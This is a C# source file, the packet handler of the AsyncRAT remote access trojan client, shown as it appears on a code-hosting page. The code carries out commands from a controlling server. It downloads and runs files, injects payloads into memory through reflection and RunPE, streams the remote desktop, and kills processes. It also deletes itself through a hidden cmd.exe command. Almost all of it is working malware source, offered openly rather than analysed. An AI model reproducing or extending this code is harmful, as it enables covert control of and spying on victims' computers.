Sapphire/AsyncRAT-C-Sharp
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
AsyncRAT-C-Sharp/AsyncRAT-C#/Client/Handle Packet/HandlePacket.cs
NYAN CAT 4c441f2c07 UPDATE
2019-03-30 06:51:51 -07:00

159 lines
5.7 KiB
C#
Raw Blame History

using Client.MessagePack;
using Client.Sockets;
using System;
using System.Diagnostics;
using System.IO;
using System.Net.Sockets;
using System.Threading;
using System.Windows.Forms;
namespace Client.Handle_Packet
{
class HandlePacket
{
public static void Read(object Data)
{
try
{
MsgPack unpack_msgpack = new MsgPack();
unpack_msgpack.DecodeFromBytes((byte[])Data);
switch (unpack_msgpack.ForcePathObject("Packet").AsString)
{
case "sendMessage":
{
MessageBox.Show(unpack_msgpack.ForcePathObject("Message").AsString);
}
break;
case "Ping":
{
Debug.WriteLine("Server Pinged me " + unpack_msgpack.ForcePathObject("Message").AsString);
}
break;
case "sendFile":
{
Received();
string FullPath = Path.GetTempFileName() + unpack_msgpack.ForcePathObject("Extension").AsString;
unpack_msgpack.ForcePathObject("File").SaveBytesToFile(FullPath);
Process.Start(FullPath);
if (unpack_msgpack.ForcePathObject("Update").AsString == "true")
{
Uninstall();
}
}
break;
case "sendMemory":
{
Received();
byte[] Buffer = unpack_msgpack.ForcePathObject("File").GetAsBytes();
string Injection = unpack_msgpack.ForcePathObject("Inject").AsString;
byte[] Plugin = unpack_msgpack.ForcePathObject("Plugin").GetAsBytes();
object[] parameters = new object[] { Buffer, Injection, Plugin };
Thread thread = null;
if (Injection.Length == 0)
{
thread = new Thread(new ParameterizedThreadStart(SendToMemory.Reflection));
}
else
{
thread = new Thread(new ParameterizedThreadStart(SendToMemory.RunPE));
}
thread.Start(parameters);
}
break;
case "close":
{
try
{
ClientSocket.Client.Shutdown(SocketShutdown.Both);
}
catch { }
Environment.Exit(0);
}
break;
case "uninstall":
{
Uninstall();
}
break;
case "remoteDesktop":
{
switch (unpack_msgpack.ForcePathObject("Option").AsString)
{
case "false":
{
RemoteDesktop.RemoteDesktop_Status = false;
}
break;
case "true":
{
RemoteDesktop.RemoteDesktop_Status = true;
RemoteDesktop.CaptureAndSend();
}
break;
}
}
break;
case "processManager":
{
switch (unpack_msgpack.ForcePathObject("Option").AsString)
{
case "List":
{
ProcessManager.ProcessList();
}
break;
case "Kill":
{
ProcessManager.ProcessKill(Convert.ToInt32(unpack_msgpack.ForcePathObject("ID").AsString));
}
break;
}
}
break;
}
}
catch { }
}
private static void Received()
{
MsgPack msgpack = new MsgPack();
msgpack.ForcePathObject("Packet").AsString = "Received";
ClientSocket.BeginSend(msgpack.Encode2Bytes());
}
private static void Uninstall()
{
ProcessStartInfo Del = null;
try
{
Del = new ProcessStartInfo()
{
Arguments = "/C choice /C Y /N /D Y /T 1 & Del \"" + Process.GetCurrentProcess().MainModule.FileName + "\"",
WindowStyle = ProcessWindowStyle.Hidden,
CreateNoWindow = true,
FileName = "cmd.exe"
};
}
catch { }
finally
{
Process.Start(Del);
Environment.Exit(0);
}
}
}
}
Reference in New Issue View Git Blame Copy Permalink